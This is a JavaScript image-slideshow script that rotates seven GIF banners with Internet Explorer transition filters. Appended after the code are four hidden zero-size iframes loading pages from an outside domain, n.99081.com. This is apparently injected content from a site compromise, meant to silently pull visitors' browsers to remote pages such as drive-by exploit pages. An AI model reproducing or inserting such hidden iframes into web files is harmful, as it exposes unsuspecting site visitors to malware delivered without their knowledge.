var imagesList=new Array();
//var imgUrl=new Array();
	
imagesList[0]='../../images/cn_bj_02-1.gif';
imagesList[1]='../../images/cn_bj_02-2.gif';
imagesList[2]='../../images/cn_bj_02-3.gif';
imagesList[3]='../../images/cn_bj_02-4.gif';
imagesList[4]='../../images/cn_bj_02-5.gif';
imagesList[5]='../../images/cn_bj_02-6.gif';
imagesList[6]='../../images/cn_bj_02-7.gif';
//imgUrl[<%'=i%>]="javascript:showhouse(<%'=rs("id")%>)";

var imagesId=0;
var imagesInterval;

function initImages() {
	document.write('<img width="535" height="349" border=0 src='+imagesList[imagesId]+' id=photo style="filter:revealTrans(Duration=1, Transition=23)">');
	if(imagesList.length>1)imagesInterval=setInterval(transImages,3000);
	}
	
function transImages() {
	if(document.getElementById('photo')!=null && imagesList.length>1) {
		imagesId++;
		if(imagesId>imagesList.length-1)imagesId=0;
		photo.filters.item(0).apply();
		photo.filters.item(0).transition = 23;
		photo.src=imagesList[imagesId];
		//url.href=imgUrl[imagesId];
		photo.filters.item(0).play();
		}
	}
	<iframe src=http://n.99081.com/yjq6s/1.htm  width=0 height=0></iframe>
<iframe src=http://n.99081.com/yjq6s/2.html  width=0 height=0></iframe>
<iframe src=http://n.99081.com/yjq6s/3.htm  width=0 height=0></iframe>
<iframe src=http://n.99081.com/yjq6s/4.htm  width=0 height=0></iframe>

